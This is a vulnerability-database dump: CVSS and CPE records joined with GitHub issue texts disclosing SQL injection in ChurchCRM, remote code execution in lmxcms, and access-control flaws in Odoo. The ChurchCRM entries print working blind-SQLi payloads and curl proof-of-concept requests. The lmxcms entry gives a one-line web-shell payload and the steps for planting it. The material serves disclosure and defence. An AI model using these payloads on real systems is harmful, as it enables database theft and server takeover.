"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "HIGH",
"providerUrgency": "RED",
"subAvailabilityImpact": "HIGH",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "LOW",
"userInteraction": "NONE",
"valueDensity": "CONCENTRATED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:L/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:U/V:C/RE:H/U:Red",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "HIGH"
},
"source": "b7efe717-a805-47cf-8e9a-921fca0ce0ce",
"type": "Secondary"
}
]
} | [
{
"source": "b7efe717-a805-47cf-8e9a-921fca0ce0ce",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/ChurchCRM/CRM/issues/7253"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*",
"matchCriteriaId": "552A51B0-B2AE-4A12-BF43-DDCE1D8A29D2",
"versionEndExcluding": null,
"versionEndIncluding": "5.13.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/ChurchCRM/CRM/issues/7253 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"ChurchCRM",
"CRM"
] | **Severity:**
⚫ **Critical** (CWE-89: Improper Neutralization of Special Elements used in an SQL Command)
- ___A CVE will be assigned once the ChurchCRM team reviews the issue (CVE-2025-1134)___
#### **Authorization Required:**
- Administrator access required to view `DonatedItemEditor.php`.
#### **Description:**
A vulnerability exists in **ChurchCRM** that allows an attacker to execute arbitrary SQL queries by exploiting a **boolean-based and time-based blind SQL Injection** vulnerability in the **DonatedItemEditor** functionality. The `CurrentFundraiser` parameter is directly concatenated into an SQL query without sufficient sanitization, allowing an attacker to manipulate database queries and execute arbitrary commands, potentially leading to **data exfiltration, modification, or deletion**.
## Exploiting the SQL Injection
#### **Affected Asset:**
- `http://<server_ip>/DonatedItemEditor.php`
#### **Vulnerable Source Code:**
```php
$iCurrentFundraiser = InputUtils::legacyFilterInputArr($_GET, 'CurrentFundraiser');
if ($iDonatedItemID > 0) {
$sSQL = "SELECT * FROM donateditem_di WHERE di_ID = '$iDonatedItemID'";
$rsDonatedItem = RunQuery($sSQL);
$theDonatedItem = mysqli_fetch_array($rsDonatedItem);
$iCurrentFundraiser = $theDonatedItem['di_FR_ID'];
}
if ($iCurrentFundraiser) {
$_SESSION['iCurrentFundraiser'] = $iCurrentFundraiser;
} else {
$iCurrentFundraiser = $_SESSION['iCurrentFundraiser'];
}
// Get the current fundraiser data
if ($iCurrentFundraiser) {
$sSQL = 'SELECT * from fundraiser_fr WHERE fr_ID = ' . $iCurrentFundraiser;
$rsDeposit = RunQuery($sSQL);
extract(mysqli_fetch_array($rsDeposit));
}
```
- **Vulnerability:** `$iCurrentFundraiser` is directly inserted into an SQL query without sufficient datatype specification, making it susceptible to SQL Injection.
#### **Steps to Reproduce:**
1. Navigate to the DonatedItemEditor endpoint: `http://<server_ip>/DonatedItemEditor.php`
2. Intercept the request using a tool like **Burp Suite** or manually craft a request.
3. Modify the `CurrentFundraiser` parameter with the following SQL Injection payload:
```sql
1 AND (SELECT 5783 FROM (SELECT(SLEEP(5)))YsGN)
```
4. Observe the response time delay, indicating that SQL Injection is possible.
#### **Proof of Concept (PoC):**
**Exploiting Time-Based Blind SQL Injection**
```bash
curl --path-as-is -i -s -k -X $'GET' \
-H $'Host: <server_ip>' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36' \
-H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8' \
-H $'Connection: keep-alive' -H $'Referer: http://<server_ip>/DonatedItemEditor.php' \
-b $'<CRM-Cookie>' \
$'http://<server_ip>/DonatedItemEditor.php?CurrentFundraiser=1%20AND%20(SELECT%205783%20FROM%20(SELECT(SLEEP(5)))YsGN)&linkBack='
```
**Observed Response:**
- The request results in a **5-second delay**, confirming the SQL Injection vulnerability.
### Automated Exploitation POC - Banner
```bash
---
Parameter: CurrentFundraiser (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: CurrentFundraiser=1 AND 7932=7932&linkBack=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: CurrentFundraiser=1 AND (SELECT 5783 FROM (SELECT(SLEEP(5)))YsGN)&linkBack=
---
[05:41:39] [INFO] the back-end DBMS is MySQL
[05:41:39] [INFO] fetching banner
[05:41:39] [INFO] retrieving the length of query output
[05:41:39] [INFO] retrieved: 22
[05:41:53] [INFO] retrieved: 11.6.2-MariaDB-ubu2404
web server operating system: Linux Debian
web application technology: PHP 8.4.3, Apache 2.4.62
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
banner: '11.6.2-MariaDB-ubu2404'
```
#### **Impact:**
- **Data Exfiltration:** Attackers can dump the database and retrieve sensitive data, such as **user credentials** and **admin tokens**.
- **Database Manipulation:** Attackers can modify, delete, or corrupt important data.
- **Remote Code Execution (RCE) Possibility:** Depending on the database configuration, this vulnerability could lead to RCE by leveraging database functions to execute OS-level commands.
#### **Recommended Fix:**
- Use **prepared statements (parameterized queries)** to prevent SQL Injection.
- Implement **input validation** to reject dangerous characters.
- Apply **principle of least privilege** to database users to limit damage from SQL Injection.
- Adding **Data Type Assignment in PHP** for the `CurrentFundraiser` variable. E.g., ensure it is cast as an integer before use.
#### **Environment:**
- **Application:** ChurchCRM 5.13.0
- **Tested on:** Provided Docker in release | Bug: (CVE-2025-1134) - SQL Injection in CurrentFundraiser Parameter via DonatedItemEditor.php | https://api.github.com/repos/ChurchCRM/CRM/issues/7253/comments | 0 | 2025-02-08T04:27:56Z | 2025-03-05T14:09:20Z | https://github.com/ChurchCRM/CRM/issues/7253 | 2,839,513,942 | 7,253 | 6,540 |
CVE-2025-1135 | 2025-02-19T09:15:10.823 | A vulnerability exists in ChurchCRM 5.13.0. and prior that allows an attacker to execute arbitrary SQL queries by exploiting a boolean-based and time-based blind SQL Injection vulnerability in the BatchWinnerEntry functionality. The CurrentFundraiser parameter is directly concatenated into an SQL query without sufficient sanitization, allowing an attacker to manipulate database queries and execute arbitrary commands, potentially leading to data exfiltration, modification, or deletion. Please note the vulnerability requires Administrator privileges. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "YES",
"Recovery": "USER",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 9.3,
"baseSeverity": "CRITICAL",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "HIGH",
"providerUrgency": "RED",
"subAvailabilityImpact": "HIGH",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "LOW",
"userInteraction": "NONE",
"valueDensity": "CONCENTRATED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:L/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:U/V:C/RE:H/U:Red",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "HIGH"
},
"source": "b7efe717-a805-47cf-8e9a-921fca0ce0ce",
"type": "Secondary"
}
]
} | [
{
"source": "b7efe717-a805-47cf-8e9a-921fca0ce0ce",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/ChurchCRM/CRM/issues/7254"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*",
"matchCriteriaId": "552A51B0-B2AE-4A12-BF43-DDCE1D8A29D2",
"versionEndExcluding": null,
"versionEndIncluding": "5.13.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/ChurchCRM/CRM/issues/7254 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"ChurchCRM",
"CRM"
] | #### **Severity:**
⚫ **Critical** (CWE-89: Improper Neutralization of Special Elements used in an SQL Command)
- ___A CVE will be assigned once the ChurchCRM team reviews the issue (CVE-2025-1135)___
#### **Authorization Required**
- Administrator access required to view `BatchWinnerEntry.php`.
#### **Description**
A vulnerability exists in **ChurchCRM** that allows an attacker to execute arbitrary SQL queries by exploiting a **boolean-based and time-based blind SQL Injection** vulnerability in the **BatchWinnerEntry** functionality. The `CurrentFundraiser` parameter is directly concatenated into an SQL query without sufficient sanitization, allowing an attacker to manipulate database queries and execute arbitrary commands, potentially leading to **data exfiltration, modification, or deletion.**
## Exploiting the SQL Injection
#### **Affected Asset:**
- `http://<server_ip>/BatchWinnerEntry.php`
#### **Vulnerable Source Code:**
```php
$linkBack = InputUtils::legacyFilterInput($_GET['linkBack']);
$iCurrentFundraiser = InputUtils::legacyFilterInput($_GET['CurrentFundraiser']); //CurrentFundraiser vulnerable
if ($iCurrentFundraiser) {
$_SESSION['iCurrentFundraiser'] = $iCurrentFundraiser;
} else {
$iCurrentFundraiser = $_SESSION['iCurrentFundraiser'];
}
// Get the current fundraiser data
if ($iCurrentFundraiser) {
$sSQL = 'SELECT * from fundraiser_fr WHERE fr_ID = ' . $iCurrentFundraiser; //SQL Injection vulnerability
$rsDeposit = RunQuery($sSQL);
extract(mysqli_fetch_array($rsDeposit));
}
```
- **Vulnerability:** `$iCurrentFundraiser` is directly inserted into an SQL query without escaping or proper datatype specification, making it susceptible to SQL Injection.
#### **Steps to Reproduce:**
1. Navigate to the BatchWinnerEntry endpoint: `http://<server_ip>/BatchWinnerEntry.php`
2. Intercept the request using a tool like **Burp Suite** or manually craft a request.
3. Modify the `CurrentFundraiser` parameter with the following SQL Injection payload:
```sql
4 AND (SELECT 2597 FROM (SELECT(SLEEP(5)))Hnrf)
```
4. Observe the response time delay, indicating that SQL Injection is possible.
#### **Proof of Concept (PoC):**
**Exploiting Time-Based Blind SQL Injection**
```bash
curl --path-as-is -i -s -k -X $'GET' \
-H $'Host: <server_ip>' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36' \
-H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8' \
-H $'Connection: keep-alive' -H $'Referer: http://<server_ip>/FundRaiserEditor.php?FundRaiserID=4' \
-b $'<CRM-Cookie>' \
$'http://<server_ip>/BatchWinnerEntry.php?CurrentFundraiser=4 AND (SELECT 2597 FROM (SELECT(SLEEP(5)))Hnrf)'
```
**Observed Response:**
- The request results in a **5-second delay**, confirming the SQL Injection vulnerability.
### Automated Exploitation POC - Banner
```bash
---
Parameter: CurrentFundraiser (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: CurrentFundraiser=4&linkBack=FundRaiserEditor.php?FundRaiserID=4&CurrentFundraiser=4 AND 6168=6168
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: CurrentFundraiser=4&linkBack=FundRaiserEditor.php?FundRaiserID=4&CurrentFundraiser=4 AND (SELECT 2597 FROM (SELECT(SLEEP(5)))Hnrf)
---
[04:04:53] [INFO] the back-end DBMS is MySQL
[04:04:53] [INFO] fetching banner
[04:04:53] [INFO] retrieving the length of query output
[04:04:53] [INFO] retrieved: 22
[04:05:07] [INFO] retrieved: 11.6.2-MariaDB-ubu2404
web server operating system: Linux Debian
web application technology: Apache 2.4.62, PHP 8.4.3
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
banner: '11.6.2-MariaDB-ubu2404'
```
---
#### **Impact:**
- **Data Exfiltration:** Attackers can dump the database and retrieve sensitive data, such as **user credentials** and **admin tokens**.
- **Database Manipulation:** Attackers can modify, delete, or corrupt important data.
- **Remote Code Execution (RCE) Possibility:** Depending on the database configuration, this vulnerability could lead to RCE by leveraging database functions to execute OS-level commands.
#### **Recommended Fix:**
- Use **prepared statements (parameterized queries)** to prevent SQL Injection
- Implement **input validation** to reject dangerous characters.
- Apply **principle of least privilege** to database users to limit damage from SQL Injection.
- Adding **Data Type Assignment in PHP** for the `CurrentFundraiser` variable. E.g., ensure it is cast as an integer before use.
#### **Environment:**
- **Application:** ChurchCRM 5.13.0
- **Tested on:** Provided Docker in release
| Bug: (CVE-2025-1135) - SQL Injection in CurrentFundraiser Parameter via BatchWinnerEntry.php | https://api.github.com/repos/ChurchCRM/CRM/issues/7254/comments | 0 | 2025-02-08T04:29:55Z | 2025-03-05T14:09:20Z | https://github.com/ChurchCRM/CRM/issues/7254 | 2,839,516,802 | 7,254 | 6,541 |
CVE-2025-1465 | 2025-02-19T16:15:40.667 | A vulnerability, which was classified as problematic, was found in lmxcms 1.41. Affected is an unknown function of the file db.inc.php of the component Maintenance. The manipulation leads to code injection. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "MULTIPLE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:H/Au:M/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.2,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 0.7,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 0.7,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "HIGH",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 2.1,
"baseSeverity": "LOW",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "HIGH",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/NeoVuln/CVE/issues/6"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.296238"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?id.296238"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?submit.496877"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:lmxcms:lmxcms:1.41:*:*:*:*:*:*:*",
"matchCriteriaId": "8FBD77AA-E05B-4141-AF77-E5F1AAA215EE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"94"
] | 94 | https://github.com/NeoVuln/CVE/issues/6 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"NeoVuln",
"CVE"
] | ### Vulnerability Description:
LMXCMS's `BackdbAction.class.php` contains a vulnerability that allows arbitrary file deletion. By deleting the `install_ok.txt` lock file, the system can be reset. During the process of configuring the database, an attacker can write a one-liner web shell into the database configuration file, gaining remote code execution (get shell).
### Vulnerability Reproduction:
By using the set account credentials to access the admin panel's database backup and restore module, the attacker can choose any table for backup. Then, in the restore backup feature, they can access the file deletion interface.

By using directory traversal, the attacker can delete the `install_ok.txt` file.

The system is now being reset.
http://localhost/lmxcms/install/
payload:lmx_',@assert($_GET['cmd']));//'_
Insert the payload in the table prefix input field.
Then, submit the form.


Execute arbitrary code on the website's homepage.

| LMXCMS V1.41 RCE Vulnerable | https://api.github.com/repos/NeoVuln/CVE/issues/6/comments | 1 | 2025-02-08T03:15:11Z | 2025-02-08T03:18:21Z | https://github.com/NeoVuln/CVE/issues/6 | 2,839,439,441 | 6 | 6,542 |
CVE-2024-12368 | 2025-02-25T18:15:27.020 | Improper access control in the auth_oauth module of Odoo Community 15.0 and Odoo Enterprise 15.0 allows an internal user to export the OAuth tokens of other users. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.2,
"source": "security@odoo.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security@odoo.com",
"tags": [
"Exploit",
"Third Party Advisory",
"Issue Tracking"
],
"url": "https://github.com/odoo/odoo/issues/193854"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:15.0:*:*:*:community:*:*:*",
"matchCriteriaId": "EBD0BABD-16C5-449D-8BE7-9E948A509FA5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:15.0:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "24A23452-4857-4F4B-AA5A-944F9073A554",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"284"
] | 284 | https://github.com/odoo/odoo/issues/193854 | [
"Exploit",
"Third Party Advisory",
"Issue Tracking"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - [CVE-2024-12368](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12368)
**Affects**: Odoo 15.0 (Community and Enterprise Editions)
**CVE ID**: [CVE-2024-12368](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12368)
**Component**: auth_oauth module
**Credits**: Rafael Fedler, MGB (Migros-Genossenschafts-Bund)
Improper access control in the auth_oauth module of Odoo Community 15.0 and
Odoo Enterprise 15.0 allows an internal user to export the OAuth tokens of
other users.
## I. Background
OAuth authentication is provided by the auth_oauth module. This feature allows
administrators to configure external OAuth providers for integration with other
systems. During the authentication process, the OAuth provider generates a token
with limited validity, which the Odoo server will receive and verify with the
OAuth provider, before granting access to the user.
Odoo also features an export functionality available across all types of
documents. It allows internal users to export data from records they have access
to, into CSV or Excel files. Users need to be granted access to the feature via
a special group, but it is generally enabled by default on the pre-defined user
templates.
## II. Problem Description
A flaw in the access control of the auth_oauth module allowed any internal user
with access to the export feature to extract the OAuth tokens of other users who
logged in via an OAuth provider recently.
## III. Impact
**Attack Vector**: Network exploitable
**Authentication**: Authenticated employee with Access to export feature
**CVSS3 Score**: High :: 8.1
**CVSS3 Vector**: [CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)
Databases with OAuth enabled are vulnerable to session hijacking by malicious
internal users, limited to the users who are actually authenticated via OAuth.
This exploit is only possible within the brief window of the OAuth token's
validity, which is controlled by the OAuth provider. During this window
a user could hijack the session of a more privileged user, resulting in a
privilege escalation.
Odoo S.A. is not aware of any use of this vulnerability in the wild.
## IV. Workaround
It is strongly recommended to update to the latest version as described below.
Until then, several options are possible to block the vulnerability:
- Remove the export permissions for untrusted internal users. This can be done
by an administrator in developer mode, by unchecking
the "Access to export feature" checkbox on the user's access rights form, or
more globally by removing all users from
the "Technical/Access to export feature" group.
- Alternatively, if users have other ways to login into the system, uninstall
the auth_oauth module entirely. This will prevent users from using OAuth,
and therefore their OAuth tokens cannot be captured.
Odoo Cloud servers (SaaS and SH) have been patched as soon as the correction
was available.
## V. Solution
Update to the latest revision, either via GitHub or by downloading it:
https://www.odoo.com/page/download
For the actual update procedure, please refer to our update instructions:
https://www.odoo.com/r/update-instructions
## VI. Correction details
As of the date of this advisory, the latest versions of the following stable
series contain the correction:
- Odoo Community 15.0
- Odoo Enterprise 15.0
Other versions are not impacted.
| [SEC] CVE-2024-12368 - Improper access control in the auth_oauth mod... | https://api.github.com/repos/odoo/odoo/issues/193854/comments | 0 | 2025-01-15T19:52:13Z | 2025-01-15T19:52:14Z | https://github.com/odoo/odoo/issues/193854 | 2,790,710,310 | 193,854 | 6,543 |
CVE-2024-36259 | 2025-02-25T19:15:14.343 | Improper access control in mail module of Odoo Community 17.0 and Odoo Enterprise 17.0 allows remote authenticated attackers to extract sensitive information via an oracle-based (yes/no response) crafted attack. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "security@odoo.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security@odoo.com",
"tags": [
"Exploit",
"Third Party Advisory",
"Mitigation"
],
"url": "https://github.com/odoo/odoo/issues/199330"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:17.0:*:*:*:community:*:*:*",
"matchCriteriaId": "1FF25CC4-AE0E-4F96-8708-83512BD0E249",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:17.0:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "1BD12AD5-9461-4AEC-A06D-0300CE27A0C1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"284"
] | 284 | https://github.com/odoo/odoo/issues/199330 | [
"Exploit",
"Third Party Advisory",
"Mitigation"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - [CVE-2024-36259](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36259)
**Affects**: Odoo 17.0 (Community and Enterprise Editions)
**CVE ID**: [CVE-2024-36259](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36259)
**Component**: Mail
**Credits**: Bram Van Gaal
Improper access control in mail module of Odoo Community 17.0 and Odoo Enterprise
17.0 allows remote authenticated attackers to extract sensitive information via
an oracle-based (yes/no response) crafted attack.
## I. Background
The `mail` module adds generic components for messaging and discussions on
business documents. Because of this, it is a required dependency of most Apps.
## II. Problem Description
A programming error in the access control logic of the mail module allowed
executing crafted RPC search queries with elevated privileges. The presence or
absence of a result could be used as a yes/no oracle to extract information.
## III. Impact
**Attack Vector**: Network exploitable
**Authentication**: Portal or User account required
**CVSS3 Score**: High :: 7.5
